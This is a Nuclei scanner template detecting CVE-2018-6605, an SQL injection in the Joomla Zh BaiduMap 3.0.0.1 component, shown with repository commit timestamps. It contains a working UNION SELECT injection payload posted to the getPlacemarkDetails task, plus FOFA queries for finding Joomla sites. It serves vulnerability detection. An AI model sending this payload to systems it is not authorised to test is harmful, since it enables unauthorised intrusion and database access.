nuclei-templates/http/cves/2018/CVE-2018-6605.yaml

53 lines
2.0 KiB
YAML
Raw Normal View History

2024-04-02 06:37:51 +00:00
id: CVE-2018-6605
info:
name: Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection
author: DhiyaneshDk
severity: critical
description: |
SQL Injection exists in the Zh BaiduMap 3.0.0.1 component for Joomla! via the id parameter in a getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, or getPathDetails request.
reference:
- https://github.com/ARPSyndicate/cvemon
- https://github.com/C0reL0ader/EaST/blob/master/exploits/efa_joomla_zh_baidumap_sqli.py
- https://www.exploit-db.com/exploits/43974
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-6605
cwe-id: CWE-89
epss-score: 0.00282
epss-percentile: 0.67968
2024-04-02 06:37:51 +00:00
cpe: cpe:2.3:a:zh_baidumap_project:zh_baidumap:3.0.0.1:*:*:*:*:joomla\!:*:*
metadata:
max-request: 1
vendor: zh_baidumap_project
product: zh_baidumap
framework: joomla\!
fofa-query:
- app="Joomla!-网站安装"
- app="joomla!-网站安装"
tags: cve,cve2018,joomla,sqli,joomla\!,zh_baidumap_project
2024-04-02 06:37:51 +00:00
variables:
num: "{{rand_int(2000000000, 2100000000)}}"
http:
- method: POST
path:
- "{{BaseURL}}/index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails"
headers:
Content-Type: application/x-www-form-urlencoded
2024-04-02 06:41:26 +00:00
body: "id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5({{num}}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+"
2024-04-02 06:37:51 +00:00
matchers-condition: and
matchers:
- type: word
words:
- "{{md5(num)}}"
- "dataexists"
part: body
- type: status
status:
- 200
# digest: 4a0a00473045022100c4600dbe01c8f7f7cb92b9c3dda61c1b9ef8d68675e2ca7d7e3696eca6090270022075b93d0557782b56c9d2522d377eb3b2fa73067a7024393997f19dad3e012dac:922c64590222798bb761d5b6d8e72950